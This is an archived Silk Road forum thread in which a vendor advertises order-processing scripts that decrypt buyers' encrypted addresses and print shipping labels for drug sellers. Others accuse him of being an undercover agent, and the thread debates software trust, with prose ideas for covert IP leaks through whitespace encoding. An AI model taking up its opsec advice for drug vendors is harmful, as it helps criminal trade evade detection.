Silk Road forums
Market => Rumor mill => Topic started by: pine on September 05, 2012, 05:10 pm
-
I've now made the leap to becoming an SR vendor. I'm not selling drugs, though, I'm selling software designed to help other vendors. Specifically to help them process orders and decrypt multiple encrypted addresses in order to do that.
Which means that those vendors processing larger numbers of orders will no longer have to deal with that sinking feeling when they see a large number of encrypted orders.
Let me get this straight.
An anonymous forum poster has just offered you the opportunity to download and execute some software. This software is closed source, uses a programming language which can communicate with the OS and Networks, and it is specifically targeted at the vendors of illegal drugs on an anonymous network.
Is this some kind of joke?
*If* it were open source, *if* it were capable of being audited by other programmers, *if* we could be sure the code wouldn't upload as X to the first few downloaders and Y or Z to the next people who download it, then yeah, offering software services on SR of this nature might just work. Of course, it's still strange to make *sales* of software for *vendors* for economic reasons. I mean there is no market even if every vendor bought the software. He could counter by arguing he is being altruistic in trying to aid SR for philosophical reasons (hence the new logo/avatar), but if that was the case the code would be open source and capable of being audited by others, possibly with a anonymous bitcoin 'tip jar' available.
But LouisCyphre *already* knows this. He has to. Nobody could be involved in IT security at any level and not know this. That means LouisCyphre is almost certainly a LE agent who has social engineered his way into SR's community with the hope that doing so will aid the delivery of a deanonymizing software exploit.
There are only two options. Either Cyphre has done something incredibly naive due to blindsight/having no money, or he is a LE agent.
Louis does not strike me as naive.
Discuss.
A final note to Louis. The platypus is a friendly, cute, comfort loving aquatic mammal, but as you recently noted, they also have poisoned spurs to defend their territory.
-
Officer Pine, that's not nice to rat on your fellow LE partner, now is it?
-
Officer Pine, that's not nice to rat on your fellow LE partner, now is it?
;D I gotta admit, that made me chuckle. Definitely didn't see that coming after reading and scrolling down the first post.
Pine has a point though, seems a little funny-style to me as well.
Time always tells the truth...
-
This is the listing: http://silkroadvb5piz3r.onion/index.php/silkroad/item/db203c965e
Silk Road Order Processing Python Toolkit (sroppy)
฿11.54 add to cart
seller: LouisCyphre
ships from: undeclared
ships to: Worldwide
category: CDs, DVDs, software, etc.
Description
The Silk Road Order Processing Python Toolkit (sroppy) is a small collection of shell and python scripts designed to make processing encrypted orders simpler for SR vendors.
Version number: 1.1
License: GPLv3
=== Important Note ===
This software is intended for use by Silk Road vendors only. While I won't object to other buyers purchasing it, the usefulness of it elsewhere may be limited.
Before purchasing this product, please contact me with any questions and so we can run some initial checks to make sure the software will run on your system.
=== System Requirements ===
* A UNIX-like operating system - Linux, BSD, OS X, etc.
* Python 2 - 2.7.3 recommended, but should work with versions 2.3 to 2.6 too.
See http://www.python.org/ for details.
* Bash - should already be installed on UNIX-like systems.
* HTMLDOC software package.
See http://www.htmldoc.org/ for details.
* A spreadsheet program like LibreOffice Calc.
Users on Apple OS X may also need to install the Xcode developer toolkit from Apple to install HTMLDOC.
=== What It Does ===
You save your order page into a spreadsheet as a CSV file. Edit the file to create two new CSV files, one for encrypted addresses and one for plain text addresses and save those to the filenames specified in the README.txt file. Then run the software.
The code then grabs the address data out of the two new files, decrypts the encrypted addresses, write the decrypted data and the other plain text addresses to HTML and then convert that to PDF or PostScript. The PDF files are then printed to envelopes, labels or paper, depending on your packaging requirements.
The software is modular so if you don't deal with encrypted data you can skip that step. If you only deal with encrypted data then you can skip the step grabbing plain text addresses.
NOTE: The conversion from HTML to PDF is performed by the HTMLDOC program. This program can only convert to A4, US Letter and Universal page sizes. Part of the individual customization process will be setting the right parameters to print to your requirements. See below for customization details.
=== What You Get ===
* The software.
* Initial support for installation and customization of approx. 2 to 3 hours (that's time spent actually working with you and I'll be reasonable with customers).
* Fixing of any bugs.
* Major updates at reduced price (via a custom order).
-
I know the vendor who asked Louis to make this.
It wasn't Louis initial idea. He was payed only after he made it for free.
He made it in hours after the req.
Think what you will, but you can always use his software on a machine thats not connected to the net.
Also the software does work.
Then why won't he release the code?
-
Am I missing something here? This piece of software is released under the GPL, which means that the source code is readily accessible, Cannot be licensed under GPL otherwise.
-
Which means that those vendors processing larger numbers of orders will no longer have to deal with that sinking feeling when they see a large number of encrypted orders.
Yeah, I definitely get a sinking feeling when business is doing well and i'm making lots of sales, <snicker>
He shouldn't call it SROPPY either, he should call it SLOPPY because that's all it appears to be
Thanks for heads up though pine, i personally don't buy any software off any vendor just cuz .. i'm paranoid, but i'm sure there are many who don't know better/havn't read this thread
-
Not sure if a collection of shell and python scripts qualify as closed source. Rather sloppy to release an exploit in easy-to-read form.
-
is it even possible to make python programs closed source? What is it, bytecode?
-
Anyway that aside, here are my rules for thinking software people here say I should run is not part of a law enforcement operation:
A. It is not for sale but is made available freely to everyone for auditing purposes. If you want money for your work, ask for donations.
B. It is, of course, entirely open source
C. Preferably, the source code is posted in a thread on this very forum
D. Enough time has passed for several people who know the language to give it the go ahead, preferably myself being one of them :P
failing to meet criteria A through D results in me not trusting your software, and by extension not trusting you.
-
Ha.. So he want vendors to dl private software?
LE, or can be a very interesting way to possibly get a shit load of bitcoins via the theft of information like pw and pins. I will never every buy anything legal on this site for obvious reasons.. unless it's going to a drug free drop.
-
Am I missing something here? This piece of software is released under the GPL, which means that the source code is readily accessible, Cannot be licensed under GPL otherwise.
Not only is he providing it under GPL, but he says that it is all shell and python scripts. Scripts are, by their very nature, source code.
I don't know LouisCyphre from Boo and don't have a need for his scripts, but I think any concerns about him being LE are extremely presumptuous.
In fact, I would go so far as to say that making such an accusation with such flimsy evidence is reckless and uncalled for.
My 0.02 BTC...
- Bit
-
I don't know LouisCyphre from Boo and don't have a need for his scripts, but I think any concerns about him being LE are extremely presumptuous.
In fact, I would go so far as to say that making such an accusation with such flimsy evidence is reckless and uncalled for.
I'll scond that!! Nothing has been said to prove that Cypher is anything of the kind. He is not the only vendor who provides "software", would you trust any of these products more or less:
http://silkroadvb5piz3r.onion/index.php/silkroad/item/b9eced345d
http://www.silkroadvb5piz3r.onion/index.php/silkroad/item/3e4be45be5
Fact is python code is not too hard to go through if you know some code. These facts aside I am not saying that any opf these products have backdoors or trojans in them. I sure as heck wouldnt trust a VM that someone sold me off of SR to do use to do anything illegal. According to Sands, Cypher's code was produced initially for vendor and does work.
-
I've now made the leap to becoming an SR vendor. I'm not selling drugs, though, I'm selling software designed to help other vendors. Specifically to help them process orders and decrypt multiple encrypted addresses in order to do that.
Which means that those vendors processing larger numbers of orders will no longer have to deal with that sinking feeling when they see a large number of encrypted orders.
Let me get this straight.
You didn't. By the way, you could have messaged me first and I could have addressed it privately, but what the Hell.
An anonymous forum poster has just offered you the opportunity to download and execute some software.
Yep, this much is correct.
This software is closed source,
No, actually it's not, all the source code is available to those who purchase it. It's even under a GPL, I'm operating on the assumption that people will want to buy from the author who will be able to solve any issues they have with it.
uses a programming language which can communicate with the OS and Networks, and it is specifically targeted at the vendors of illegal drugs on an anonymous network.
Well, it could probably be adapted for other similar types of sites (by function rather than content), but most of those already have APIs.
Is this some kind of joke?
Nope. It's a response to Peach's "buyer's etiquette" thread in the Silk Road Discussion forum a couple of weeks ago.
*If* it were open source,
It is.
*if* it were capable of being audited by other programmers,
It's not very big at this point and only performs two main tasks. It's very easy to audit.
In fact, in addition to the thread I mentioned above, this also grew out of a private request by another vendor to produce the code. That vendor knows exactly what it does (no, I'm not going to name them, their forum name is different from their vendor name, but if they choose to step in here and confirm I won't object). So that vendor already knows what each part of the code does, that it only runs on the vendor's system and makes no network connections.
I'll tell you what, I'll speak to DPR about independently vetting it offline. Would that be good enough?
*if* we could be sure the code wouldn't upload as X to the first few downloaders and Y or Z to the next people who download it, then yeah, offering software services on SR of this nature might just work.
I reckon it can, that's why I'm bothering to do this.
Of course, it's still strange to make *sales* of software for *vendors* for economic reasons. I mean there is no market even if every vendor bought the software.
The market is certainly a niche one. Especially when it may not be worth it for smaller volume vendors.
I may come up with something for buyers later, but my focus is just this for now.
He could counter by arguing he is being altruistic in trying to aid SR for philosophical reasons (hence the new logo/avatar),
I'm being an agorist, not an altruist.
but if that was the case the code would be open source and capable of being audited by others,
The GPL does not prevent selling the software, the code is distributed under the GPLv3.
possibly with a anonymous bitcoin 'tip jar' available.
The return on that would be insignificant.
I know that the code will pass any audit, that it does not connect to any other systems from where it is run and does not re-implement OpenPGP (it calls GPG to decrypt multiple files simultaneously using the --decrypt-files flag I mentioned in Peach's thread).
But LouisCyphre *already* knows this. He has to. Nobody could be involved in IT security at any level and not know this.
There's more than one way to distribute open source software and it does not require giving it away.
That means LouisCyphre is almost certainly a LE agent who has social engineered his way into SR's community with the hope that doing so will aid the delivery of a deanonymizing software exploit.
Complete and utter bullshit, both regarding me and the software.
All the software does is this (with user interaction):
1) The vendor logs into SR, views their order page and selects the order data (which is a HTML table.
2) The vendor copies the entire table into a spreadsheet (e.g. LibreOffice Calc) and saves it.
3) The vendor edits out the entries containing no encrypted data and saves all the entries containing encrypted data in the address field into a new CSV file called cryptorders.csv.
4) The vendor opens the original spreadsheet in no. 2 and does the same thing for unencrypted data, saved as clearorders.csv.
5) The vendor runs the first script which reads the CSV and saves separate files named according to the buyer's username, the transaction number and writes the content of the address field to that text file. It then invokes GPG (gpg --decrypt-files *.asc) to decrypt the encrypted data.
6) The vendor then runs the second script to review *.txt and make sure those files only contain names and addresses for printing.
7) The next major piece of code rewrites all of those addresses as basic HTML. That HTML is then converted to PDF using a third party program which needs to be installed (HTMLDOC, which is released under GPLv2 and is available at www.htmldoc.org).
8) Then the labels/envelopes are printed.
Currently the Python code uses the csv module and basic Python functions, mainly involving lists, reading files and writing new files.
There are only two options. Either Cyphre has done something incredibly naive due to blindsight/having no money, or he is a LE agent.
Your logic is flawed.
I'm not going to make enough money to live off it, but I don't see what's wrong with making some money off it.
The LE accusation only holds true if the code can somehow report on users, which it doesn't. It can quite easily run on a completely disconnected system. It makes no difference to the program.
Pine, this is the second time you've accused me of being LE based on a misunderstanding of software. The first time was not understanding how GPG verifies signatures. You were able to verify that my explanation matched GPG's documentation independently and I have no doubt that in time the independent verification will prove me right here.
Louis does not strike me as naive.
Thanks.
Discuss.
Gladly. Got any other questions I haven't addressed already?
A final note to Louis. The platypus is a friendly, cute, comfort loving aquatic mammal, but as you recently noted, they also have poisoned spurs to defend their territory.
Also, from memory, only the males have the spurs. So it's more accurate to say yours are Schrödinger's spurs. It's been a few years (or so, I'm not going to be specific on the number for my security) since I've been in Australia, but I've been fascinated by the weird animals they have down there.
-
This is the listing: http://silkroadvb5piz3r.onion/index.php/silkroad/item/db203c965e
Thanks for the advertising, I'll update the listing later to refer to this thread as well.
-
I know the vendor who asked Louis to make this.
It wasn't Louis initial idea. He was payed only after he made it for free.
He made it in hours after the req.
Think what you will, but you can always use his software on a machine thats not connected to the net.
Also the software does work.
Thanks. :)
-
I know the vendor who asked Louis to make this.
It wasn't Louis initial idea. He was payed only after he made it for free.
He made it in hours after the req.
Think what you will, but you can always use his software on a machine thats not connected to the net.
Also the software does work.
Then why won't he release the code?
See my response to Pine's initial post. The software is being distributed under the GPLv3, but it is not being distributed for free by me. That wouldn't stop someone buying it and then posting the code, but I'm including the 2 to 3 hours of support plus client specific customisation (which I expect to be for customising the PDF conversion component and printing command) with my listing.
Distribution which does not come from me obviously doesn't benefit from that. If it ends up being released (or resold) by others, I'll probably add a custom listing for support to people who obtain it in other ways and find that they need help with it.
It's not very complicated at the moment, but porting it to Windows will probably require additional functions.
-
its completely pointless software anyway lol,
he propses solution to a problem none of us vendors face
no one will buy hahah
nice LE can donate fees to keep SR alive though =D
-
Am I missing something here? This piece of software is released under the GPL, which means that the source code is readily accessible, Cannot be licensed under GPL otherwise.
Exactly! Also, I figured that using any other license wouldn't matter if others who receive the code release it anyway, so I selected a license that guarantees other changes be able to be released.
I didn't choose the GPL Affero v3 because that would require publicly releasing every version, including customised ones for specific clients. For example, the version currently available is version 1.1, but version 1.0 doesn't have the code for handling plain text orders only because the vendor who initially contacted me cancels unencrypted orders.
Obviously the GPLv3 does not prevent selling code released under that license. Without going into specifics, I've discussed this with RMS face-to-face, but all this can be confirmed from the Free Software Foundation.
The GPLv3 simply grants certain rights to users and the obligation that the source be made available with the distribution. Since the distribution *is* the source code (Python executables are great like that), then that obligation is covered.
-
Which means that those vendors processing larger numbers of orders will no longer have to deal with that sinking feeling when they see a large number of encrypted orders.
Yeah, I definitely get a sinking feeling when business is doing well and i'm making lots of sales, <snicker>
It depends on volume. The SR system doesn't provide the function that this software does (converting address data to a printable form).
He shouldn't call it SROPPY either, he should call it SLOPPY because that's all it appears to be
I disagree, but then I'm supposed to.
Thanks for heads up though pine, i personally don't buy any software off any vendor just cuz .. i'm paranoid, but i'm sure there are many who don't know better/havn't read this thread
An undestandable attitude. Hopefully Pine's fears will be addressed here.
-
Not sure if a collection of shell and python scripts qualify as closed source. Rather sloppy to release an exploit in easy-to-read form.
It's not closed source. There's no way I'd expect vendors to use some closed source thing, that'd be just asking for trouble.
Actually a closed source app would be grounds for making an LE accusation.
-
No matter how trusted anyone is, I wouldnt have run the code even on a virtual machine. Only in case it is stored in gentoo repository and signed with developers' keys. Or it is very short to audit it. I think vendors probably know what they do. I wont stop them if they buy anything.
It's very short and very clear.
That means LouisCyphre is almost certainly a LE agent who has social engineered his way into SR's community with the hope that doing so will aid the delivery of a deanonymizing software exploit.
Now we know that Louis is a LE agent.
No you don't, you're simply believing a hyped up false assumption.
I am beginning to think that death will finally be upon him and that he should find some place to hide where he would not be found. But we're not going to kill him, are we Pine?
I take my security seriously, I doubt anyone here will track me down or could even be bothered to. I follow the same type of non-aggression principle as other agorists, though, so if someone did I'd defend myself by whatever method I deemed appropriate under the circumstances.
-
is it even possible to make python programs closed source? What is it, bytecode?
No, it's just .py and .sh scripts which are executable. The closed source claim is a red herring to back up the LE false assumption.
-
Anyway that aside, here are my rules for thinking software people here say I should run is not part of a law enforcement operation:
A. It is not for sale but is made available freely to everyone for auditing purposes. If you want money for your work, ask for donations.
It's not free of cost, but it is released under GPLv3 and is easy to audit by buyers (just by following a Python tutorial and then looking at the code).
I'm going to speak to DPR after I've finished these replies and see if he wants to review the code.
B. It is, of course, entirely open source
It is.
C. Preferably, the source code is posted in a thread on this very forum
I'm not going to because I'm trying to sell it, but if someone buys it and posts the code then I can't stop them. The GPL allows that.
D. Enough time has passed for several people who know the language to give it the go ahead, preferably myself being one of them :P
Well, that is what auditing is for.
failing to meet criteria A through D results in me not trusting your software, and by extension not trusting you.
An understandable approach. I don't expect you to trust this straight away, but I suspect that in time you'll see that Pine's accusation is a false one.
-
Ha.. So he want vendors to dl private software?
Open source software. It's free as in freedom, not as in beer.
LE, or can be a very interesting way to possibly get a shit load of bitcoins via the theft of information like pw and pins. I will never every buy anything legal on this site for obvious reasons.. unless it's going to a drug free drop.
It doesn't do that, I've described above exactly what it does.
-
I think Louis pretty much defended himself to everyones satisfaction. That being said, it's easy to see how naive vendors who don't know much about code could be convinced to use software that might record their actions, etc.
To me, the idea of buying a piece of software to do something that I can do manually just seems like another way that my security can be comprimised. (I mean in the context of Silk Road--in real life, thats the point of software...to automate and simplify tasks that we do repetitively). Obviously, any vendor that does purchase your software should do their due diligence to ensure that the software does what they think it does and nothing more. But thats up to each vendor to take upon themselves. Not doing so would constitute a huge risk. It's open source, so it falls completely on the vendor who purchases it.
All in all, I'll just say good luck to LoiusCyphre. You put the time in, developed a solution to a "problem", and now you will hopefully make something from it.
-
OMG Louis I'm sorry about this thread here....
No you see what SR vendors have to deal with...
sheer idiocy....
Oh, I well and truely get it. As for the thread, it's not your fault and I'm sure time will prove the veracity of what I say.
-
Am I missing something here? This piece of software is released under the GPL, which means that the source code is readily accessible, Cannot be licensed under GPL otherwise.
Not only is he providing it under GPL, but he says that it is all shell and python scripts. Scripts are, by their very nature, source code.
Exactly. The choice of using Bash and Python was deliberate for that reason.
I don't know LouisCyphre from Boo and don't have a need for his scripts, but I think any concerns about him being LE are extremely presumptuous.
In fact, I would go so far as to say that making such an accusation with such flimsy evidence is reckless and uncalled for.
Thanks. :)
-
Oh Pine, you are such a moron. See what you gone and done?!
-
its completely pointless software anyway lol,
he propses solution to a problem none of us vendors face
If that were true then I wouldn't have been approached by a vendor in the first place.
no one will buy hahah
Time will tell, but I never expected to get many sales for such a niche product.
nice LE can donate fees to keep SR alive though =D
They haven't through me, but LE funding SR would be funny.
-
sorry LC i wasn't really thinking, i just generally tke pine's word for gold =D
all the luck with you venture
-
I think Louis pretty much defended himself to everyones satisfaction.
Thanks.
That being said, it's easy to see how naive vendors who don't know much about code could be convinced to use software that might record their actions, etc.
Which is understandable.
To me, the idea of buying a piece of software to do something that I can do manually just seems like another way that my security can be comprimised. (I mean in the context of Silk Road--in real life, thats the point of software...to automate and simplify tasks that we do repetitively).
Also understandable, which is why it is open source and easily able to be audited
Obviously, any vendor that does purchase your software should do their due diligence to ensure that the software does what they think it does and nothing more. But thats up to each vendor to take upon themselves. Not doing so would constitute a huge risk. It's open source, so it falls completely on the vendor who purchases it.
I expect that part of the support component of the purchase will be explaining what each part of the code does to the user's satisfaction.
All in all, I'll just say good luck to LoiusCyphre. You put the time in, developed a solution to a "problem", and now you will hopefully make something from it.
Thanks.
-
Why did pine fly off the handle and make accusations about LouisCyphre which are seemingly untrue and could potentially stifle new business through his vendor's account ? Very strange indeed! It's not like pine to make such a simple mistake as claiming the software is closed source when clearly it's not. ??? I feel LouisCyphre has more than adequately posted answers to all questions asked of him. Well done LouisCyphre. :)
-
An application like this would not be difficult to make, (not trying to downgrade your hard work!) would not be an overwhelming amount of code, and if its open source would easily be detected to be anything other than advertised by an average software person. I think he just likes to code and wanted to help.
-
^because pine is le, been trying to tell you guys that.
-
sorry LC i wasn't really thinking, i just generally tke pine's word for gold =D
all the luck with you venture
Thanks. I understand why people might automatically react in support of Pine, I'm not angry at them or you. Other projects of Pine's, like PGP Club, are valuable additions to SR, which is why I'm still involving myself in PGP Club.
Some people are concerned and have questions and I'm happy to address those questions, hence the large number of replies here.
The irony, though, is that this thread came less than 48 hours after I posted this on the problems of accusations without basis:
http://dkn255hz262ypmii.onion/index.php?topic=37834.msg448062#msg448062
-
Now we know that Louis is a LE agent. I am beginning to think that death will finally be upon him...But we're not going to kill him, are we Pine?
We don't ask Pine what will be done, we do what Pine instructs us to do -- without question!
Modzi
-
Why did pine fly off the handle and make accusations about LouisCyphre which are seemingly untrue and could potentially stifle new business through his vendor's account ? Very strange indeed! It's not like pine to make such a simple mistake as claiming the software is closed source when clearly it's not. ??? I feel LouisCyphre has more than adequately posted answers to all questions asked of him. Well done LouisCyphre. :)
I still think vendors selling software sets a precedent that we need to be careful about. A lot of good can come from having programmers working to make software to help us become more secure and make our lives easier. In fact, I have some projects of my own that I am working on. At the same time we need to realize that the people here are of course risking very real prison sentences, and that the utmost care must be taken regarding running software from people. I think that the best approach is one of open source publicly audited only. If a vendor knows enough python to audit the code they will make it themselves, so there is no point in anyone who is capable of auditing it paying for it. I don't think that we should have a culture here that promotes haphazardly running code from others, that will certainly lead to people being pwnt and I can very easily see Pines concern, although I also see that she is somewhat fear mongering or at least talking about technical things she doesn't know enough about to make accusations based on (for example claiming a python program is closed source, I don't know if that is even possible, maybe it can be distributed as bytecode or obfuscated, but that is hardly what anyone thinks of when python scripts are mentioned, and it seems she has absolutely nothing to base her claims of this software not being open source on).
My suggestion remains, that people not use software offered by people here, unless it is open source and the code is available for everyone here to audit. I think this is the only way we can create tools for each other to use while not being at risk of malicious activity. I would love to make money from the tools I will hopefully be providing soon, but I realize that nobody in their right mind is going to run code from here unless it is publicly audited, and the people who do are going to end up getting pwnt, be it from Louise or someone else.
-
Why did pine fly off the handle and make accusations about LouisCyphre which are seemingly untrue and could potentially stifle new business through his vendor's account ? Very strange indeed! It's not like pine to make such a simple mistake as claiming the software is closed source when clearly it's not. ???
That is something I'd like an answer to as well, but I'm not holding my breath.
I feel LouisCyphre has more than adequately posted answers to all questions asked of him. Well done LouisCyphre. :)
Thanks.
-
An application like this would not be difficult to make, (not trying to downgrade your hard work!) would not be an overwhelming amount of code, and if its open source would easily be detected to be anything other than advertised by an average software person.
Right on all points. The entirety of the code is currently under 200 lines (including comments) and spread across a bit over half a dozen files (not counting documentation, the license and my key, which are included).
I think he just likes to code and wanted to help.
And possibly make some money for my time, but yes.
-
^because pine is le, been trying to tell you guys that.
You're welcome to your opinion, but please hold off on the accusations without proof.
-
So someone please tell me who is da realest LE in this mothafuckin thread so I avoid buying drugs from him/her!!
Thank you very much.
-
Can a pro seller cough up the coin to buy this code, and post it? Open source python (what he says) is easy to read and if we can spot LE or a hacker, imagine the hilarity! If its clean and it works, we will see!
-
Why did pine fly off the handle and make accusations about LouisCyphre which are seemingly untrue and could potentially stifle new business through his vendor's account ? Very strange indeed! It's not like pine to make such a simple mistake as claiming the software is closed source when clearly it's not. ??? I feel LouisCyphre has more than adequately posted answers to all questions asked of him. Well done LouisCyphre. :)
I still think vendors selling software sets a precedent that we need to be careful about. A lot of good can come from having programmers working to make software to help us become more secure and make our lives easier. In fact, I have some projects of my own that I am working on.
Cool.
At the same time we need to realize that the people here are of course risking very real prison sentences, and that the utmost care must be taken regarding running software from people.
Fair enough, I agree.
Also, since I am not LE and am providing software which can facilitate vendor operations I think real LE would love to prosecute me for that. Probably a conspiracy charge for every sale plus the initial contract which led to it.
I think that the best approach is one of open source publicly audited only.
I can see your point, but your faith in the generosity of users is, I suspect, exaggerated. Your previous suggestion of a developer tip jar would be unlikely to garner more than a few BTC. I'm basing this opinion on what my experience with PGP Club and GPG instruction in other threads and via PMs.
There's nothing in the GPL which prevents selling the code under that license. In fact, here's the part of the FAQ which relates to it:
If I use a piece of software that has been obtained under the GNU GPL, am I allowed to modify the original code into a new program, then distribute and sell that new program commercially?
You are allowed to sell copies of the modified program commercially, but only under the terms of the GNU GPL. Thus, for instance, you must make the source code available to the users of the program as described in the GPL, and they must be allowed to redistribute and modify it as described in the GPL.
These requirements are the condition for including the GPL-covered code you received in a program of your own.
Clearnet source: https://www.gnu.org/licenses/gpl-faq.html#GPLCommercially
If a vendor knows enough python to audit the code they will make it themselves, so there is no point in anyone who is capable of auditing it paying for it.
Yep.
I don't think that we should have a culture here that promotes haphazardly running code from others, that will certainly lead to people being pwnt and I can very easily see Pines concern,
I can understand that concern too and I share it. There have been calls for SR's source code to be released for similar reasons, but that's not too likely either.
although I also see that she is somewhat fear mongering or at least talking about technical things she doesn't know enough about to make accusations based on
Thanks. She does jump to conclusions sometimes, this isn't the first time.
(for example claiming a python program is closed source, I don't know if that is even possible, maybe it can be distributed as bytecode or obfuscated, but that is hardly what anyone thinks of when python scripts are mentioned, and it seems she has absolutely nothing to base her claims of this software not being open source on).
It's possible to compile Python code as a Windows executable, but that's not what this is. I did it once years ago and it turned a script that was a few Kb in size into something like 1.5Mb. Ridiculous. I'd rather just install Python, if it's not already installed, and run the code.
I've never bothered trying to reverse engineer the bytecode from any of my scripts, but I believe it's usually pretty straight forward. I think it might be possible to obscure it, but I can't remember because I've never been interested in doing that.
My suggestion remains, that people not use software offered by people here, unless it is open source and the code is available for everyone here to audit. I think this is the only way we can create tools for each other to use while not being at risk of malicious activity. I would love to make money from the tools I will hopefully be providing soon, but I realize that nobody in their right mind is going to run code from here unless it is publicly audited, and the people who do are going to end up getting pwnt, be it from Louise or someone else.
There's no "e" in my first name. Unlike Pine, I'm not quibbling about my gender. ;)
Anyway, I certainly understand your point of view, which is why I'm aiming for balance between being able to sell my product and address valid security concerns.
-
Think what you will, but you can always use his software on a machine thats not connected to the net.
Of course. All vendors use physical Air Gaps by burning information from the Internet on read only CD/DVDs, decrypt on the isolated machine, and then in order to communicate back across the Air Gap they use either the keyboard to transfer information across to the networked machine using their eyeballs, or else they utilize something like a checksum to ensure the information coming back on a read only CD/DVD is precisely what was intended to come back across. This will mean manually adding up and knowing the exact data.
Because that's pretty much the only way what you said would work, could work. Otherwise it just doesn't. So what you said is essentially for practical purposes complete bullshit.
Am I missing something here? This piece of software is released under the GPL, which means that the source code is readily accessible, Cannot be licensed under GPL otherwise.
Yes. Because it's totally irrelevant so long as the code is not explicitly posted whereby it can be audited. For several reasons, four of which are:
A: What you get today, may not be what you get tomorrow. A bait and switch is as simple as it gets with exploits.
B: The exploit may not be in the actual software, ever. The malware could be in the related pieces of software you need to acquire to make it 'work'. e.g. HTMLDOCs. This was a exploit achieved by the Vietnamese Secret Service against Tor users a few years ago. People downloaded Tor and it was fine. But they needed to download a language set for Vietnamese for the windows operating system. Turned out the backdoor was in that language set they downloaded, and everybody who was reading Vietnamese on windows had become part of the Vietnamese Secret Service's botnet.
C: The vast majority of vendors will not be computer programmers and will have to rely on trust in somebody else's judgement. This is very bad. If you have a flock of apparent experts telling you it's legitimate, you let down your guard and then you get fucked.
D: There are extremely clever ways of putting exploits into code, even when it's capable of being monitored, it can be hard to tell. It's not like reading a book, even experienced programers could be caught out if they are not trained to analyze potentially malicious code. Code analyis for finding memory leaks and other bugs is one thing, hunting down a backdoor is something else completely.
Don't expect an exploit to be straight forward. They are deliberately engineered to obfuscate the origin of the exploit. That is kind of the entire point of an exploit.
Anyway that aside, here are my rules for thinking software people here say I should run is not part of a law enforcement operation:
A. It is not for sale but is made available freely to everyone for auditing purposes. If you want money for your work, ask for donations.
B. It is, of course, entirely open source
C. Preferably, the source code is posted in a thread on this very forum
D. Enough time has passed for several people who know the language to give it the go ahead, preferably myself being one of them :P
failing to meet criteria A through D results in me not trusting your software, and by extension not trusting you.
Exactly.
I'll scond that!! Nothing has been said to prove that Cypher is anything of the kind. He is not the only vendor who provides "software", would you trust any of these products more or less:
http://silkroadvb5piz3r.onion/index.php/silkroad/item/b9eced345d
http://www.silkroadvb5piz3r.onion/index.php/silkroad/item/3e4be45be5
Fact is python code is not too hard to go through if you know some code. These facts aside I am not saying that any opf these products have backdoors or trojans in them. I sure as heck wouldnt trust a VM that someone sold me off of SR to do use to do anything illegal. According to Sands, Cypher's code was produced initially for vendor and does work.
Mr www.hiddenservice.onion you've got to be joking. "Darknet Bootable USB" could easily have software or even hardware backdoor exploit. Every single purchaser of that could be LE for all you know. I wouldn't trust these for a single pictosecond. And what's the rest of your argument? You wouldn't trust a VM somebody anonymous sold you, but you'll trust some other anonymous dude selling you software? But wait! No! I must be wrong! Because some *other* totally anonymous dude says it's legit! It must be so! ZOMG!
Your operational security, I would not pay for it with somebody else's money.
-
*If* it were open source,
It is.
This is a technicality, you know exactly what I mean by it, it's not 'open' if it's not visible for auditing *before* anybody uses it.
I'll tell you what, I'll speak to DPR about independently vetting it offline. Would that be good enough?
Louis, if DPR himself came down from the clouds in a blaze of heavenly glory on a magnificent green camel and said the code was legitimate but that we couldn't independently audit it, it still wouldn't count for much. This is because DPR's account could be compromised. Not to mention because even if DPR was posting (lest we forget Sabu) to say it was legitimate, it still doesn't prove anything. This is because we would trusting in somebody. We assume everybody here is a potential LE agent or could become one, that is why this system works. I know you know this, I'm just making a mini-tutorial on how darknet markets are supposed to operate for any others watching this thread who don't know.
*if* we could be sure the code wouldn't upload as X to the first few downloaders and Y or Z to the next people who download it, then yeah, offering software services on SR of this nature might just work.
I reckon it can, that's why I'm bothering to do this.
Oh really? Tell me, how precisely is that supposed to work?
Of course, it's still strange to make *sales* of software for *vendors* for economic reasons. I mean there is no market even if every vendor bought the software.
The market is certainly a niche one. Especially when it may not be worth it for smaller volume vendors.
I may come up with something for buyers later, but my focus is just this for now.
Uh huh. I bet.
possibly with a anonymous bitcoin 'tip jar' available.
The return on that would be insignificant
Whether or not that is true, it is contradictory to claim you want more money, and then target a market so insignificant. I think SRarians are more generous than you imagine, especially a collection of bitcoin rich vendors over time, but that's beside the point. You have to reconcile two opposites for your offer to make sense, so it doesn't. But your business acumen is also not the main issue.
The main issue is that you wanted the big vendors to acquire your software and run it, and that this software was not capable of being audited on this forum, and that even if it was visible, there is still the questions of whether some sneaky side channel attack wouldn't be made since the software relies on downloading new unknown pieces of software, which could easily contain exploits delivered exclusively on those dependencies downloaded through the Tor network. Or that you wouldn't simply perform a bait and switch with the software. A single line of code could compromise a vendor's IP address, and it wouldn't have to look obvious like a direct network call either.
Indeed, the exploit doesn't necessarily need to even to communicate the IP over the network without the aid of the vendor. The software could cleverly adjust the whitespace count of a PGP plaintext message so that it contained IP address information. Then the LE buyer could extract the IP address directly from the decrypted message. Very simple, very effective, almost impossible to catch on the fly. You wouldn't even need to target the encryption software this way.
To avoid sneaky tricks, the rule is simple and highly efficient. Don't trust software from anonymous sources with extreme prejudice with the exception of the specific situation kmfkewm has mentioned. And even then you have to watch it. The forum could be populated by 1001 people and 1000 of them could be sock puppets. LE have used such software on carding forums and the like with great effect before now.
I know that the code will pass any audit, that it does not connect to any other systems from where it is run and does not re-implement OpenPGP (it calls GPG to decrypt multiple files simultaneously using the --decrypt-files flag I mentioned in Peach's thread).
As I mentioned briefly above, there is a multitude of ways of non obvious ways of compromising a system because you're using somebody else's code. Any software dependencies could themselves contain an exploit, and it can be a multi-stage process. It could be the whitespace insertion/removal plaintext encoding trick, replacement of characters with esoteric unicode char synonyms, there's a entire universe of possibilities. Just because pine might not see if pine examines the code personally doesn't mean much either. Exploits are like a magicians magic trick. It's the one thing you don't think of, that makes it seem like an impossibility.
But LouisCyphre *already* knows this. He has to. Nobody could be involved in IT security at any level and not know this.
There's more than one way to distribute open source software and it does not require giving it away.
I never disputed that. This is just a way to sidetrack the discussion. There is a BIG difference between what is acceptable on a civilian forum, and on a forum of international drug smugglers.
That means LouisCyphre is almost certainly a LE agent who has social engineered his way into SR's community with the hope that doing so will aid the delivery of a deanonymizing software exploit.
Complete and utter bullshit, both regarding me and the software.
All the software does is this (with user interaction):
1) The vendor logs into SR, views their order page and selects the order data (which is a HTML table.
2) The vendor copies the entire table into a spreadsheet (e.g. LibreOffice Calc) and saves it.
3) The vendor edits out the entries containing no encrypted data and saves all the entries containing encrypted data in the address field into a new CSV file called cryptorders.csv.
